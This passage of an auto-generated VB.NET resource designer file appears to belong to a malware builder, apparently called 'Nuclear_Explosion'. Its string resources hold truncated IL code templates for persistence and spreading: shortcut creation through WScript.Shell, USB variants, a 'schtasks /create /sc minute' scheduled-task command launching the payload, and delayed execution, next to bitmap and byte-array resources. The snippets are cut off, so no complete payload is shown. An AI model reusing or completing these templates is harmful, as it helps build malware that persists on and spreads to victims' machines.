        '''      IL_023f:  ldstr      &quot;CreateShortcut&quot;
        '''      IL_0244:  ldc.i4.1
        '''      IL_0245:  newarr     [mscorlib]System.Object
        '''      IL_024a:  dup
        '''      I [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShortcutLnk() As String
            Get
                Return ResourceManager.GetString("ShortcutLnk", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0261:  nop
        '''      IL_0262:  ldstr      &quot;WScript.Shell&quot;
        '''      IL_0267:  ldstr      &quot;&quot;
        '''      IL_026c:  call       object [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::CreateObject(string,
        '''                                                                                                         string)
        '''      IL_0271:  ldnull
        '''      IL_0272:  ldstr      &quot;CreateShortcut&quot;
        '''      IL_0277:  ldc.i4.1
        '''      IL_0278:  newarr     [mscorlib]System.Object
        '''      IL_027d:  dup
        '''      I [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShortcutLNKUSB() As String
            Get
                Return ResourceManager.GetString("ShortcutLNKUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_02af:  nop
        '''      IL_02b0:  ldstr      &quot;WScript.Shell&quot;
        '''      IL_02b5:  ldstr      &quot;&quot;
        '''      IL_02ba:  call       object [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::CreateObject(string,
        '''                                                                                                         string)
        '''      IL_02bf:  ldnull
        '''      IL_02c0:  ldstr      &quot;CreateShortcut&quot;
        '''      IL_02c5:  ldc.i4.1
        '''      IL_02c6:  newarr     [mscorlib]System.Object
        '''      IL_02cb:  dup
        '''      I [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShortcutURL() As String
            Get
                Return ResourceManager.GetString("ShortcutURL", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_02e8:  nop
        '''      IL_02e9:  ldstr      &quot;WScript.Shell&quot;
        '''      IL_02ee:  ldstr      &quot;&quot;
        '''      IL_02f3:  call       object [Microsoft.VisualBasic]Microsoft.VisualBasic.Interaction::CreateObject(string,
        '''                                                                                                         string)
        '''      IL_02f8:  ldnull
        '''      IL_02f9:  ldstr      &quot;CreateShortcut&quot;
        '''      IL_02fe:  ldc.i4.1
        '''      IL_02ff:  newarr     [mscorlib]System.Object
        '''      IL_0304:  dup
        '''      I [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShortcutURLUSB() As String
            Get
                Return ResourceManager.GetString("ShortcutURLUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_03c4:  nop
        '''      IL_03c5:  ldstr      &quot;schtasks /create /sc minute /mo %TT% /tn \&quot;%TNINL%\&quot;&quot;
        '''      + &quot; /tr \&quot;&quot;
        '''      IL_03ca:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_03cf:  ldstr      &quot;\&quot;&quot;
        '''      IL_03d4:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string,
        '''                                                                  string)
        '''      IL_03d9:  ldc.i4.0
        '''      IL_03da:  ldc.i4.0
        '''  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShuldedTask() As String
            Get
                Return ResourceManager.GetString("ShuldedTask", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_040f:  nop
        '''      IL_0410:  ldstr      &quot;schtasks /create /sc minute /mo %TT% /tn \&quot;%TNINL%\&quot;&quot;
        '''      + &quot; /tr \&quot;&quot;
        '''      IL_0415:  ldsfld     string Nuclear_Explosion.Atomic::App
        '''      IL_041a:  ldstr      &quot;\&quot;&quot;
        '''      IL_041f:  call       string [mscorlib]System.String::Concat(string,
        '''                                                                  string,
        '''                                                                  string)
        '''      IL_0424:  ldc.i4.0
        '''      IL_0425:  ldc.i4.0
        '''  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property ShuldedTaskUSB() As String
            Get
                Return ResourceManager.GetString("ShuldedTaskUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0001:  nop
        '''      IL_0002:  ldstr      &quot;%SLEEP%&quot;
        '''      IL_0007:  call       float64 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToDouble(string)
        '''      IL_000c:  ldc.r8     1000.
        '''      IL_0015:  mul
        '''      IL_0016:  call       float64 [mscorlib]System.Math::Round(float64)
        '''      IL_001b:  conv.ovf.i4
        '''      IL_001c:  call       void [mscorlib]System.Threading.Thread::Sleep(int32)
        '''      IL_0021:  nop
        '''      IL_0022:  leave.s    IL_0031
        '''
        '''    }  // end  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property Sleep() As String
            Get
                Return ResourceManager.GetString("Sleep", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized string similar to .try
        '''    {
        '''      IL_0001:  nop
        '''      IL_0002:  ldstr      &quot;%SLEEP%&quot;
        '''      IL_0007:  call       float64 [Microsoft.VisualBasic]Microsoft.VisualBasic.CompilerServices.Conversions::ToDouble(string)
        '''      IL_000c:  ldc.r8     1000.
        '''      IL_0015:  mul
        '''      IL_0016:  call       float64 [mscorlib]System.Math::Round(float64)
        '''      IL_001b:  conv.ovf.i4
        '''      IL_001c:  call       void [mscorlib]System.Threading.Thread::Sleep(int32)
        '''      IL_0021:  nop
        '''      IL_0022:  leave      IL_0037
        '''
        '''    }  // end  [rest of string was truncated]&quot;;.
        '''</summary>
        Friend ReadOnly Property SleepUSB() As String
            Get
                Return ResourceManager.GetString("SleepUSB", resourceCulture)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Spring_Green() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Spring_Green", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Steel_Blue() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Steel_Blue", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Teal() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Teal", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property THE_MYSTERIES_LEGACY() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("THE_MYSTERIES_LEGACY", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property Tsunamii() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("Tsunamii", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Byte[].
        '''</summary>
        Friend ReadOnly Property UNI() As Byte()
            Get
                Dim obj As Object = ResourceManager.GetObject("UNI", resourceCulture)
                Return CType(obj,Byte())
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property v_B01___3hud() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("v_B01___3hud", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
        
        '''<summary>
        '''  Looks up a localized resource of type System.Drawing.Bitmap.
        '''</summary>
        Friend ReadOnly Property window_app_blank_icon() As System.Drawing.Bitmap
            Get
                Dim obj As Object = ResourceManager.GetObject("window_app_blank_icon", resourceCulture)
                Return CType(obj,System.Drawing.Bitmap)
            End Get
        End Property
    End Module
End Namespace
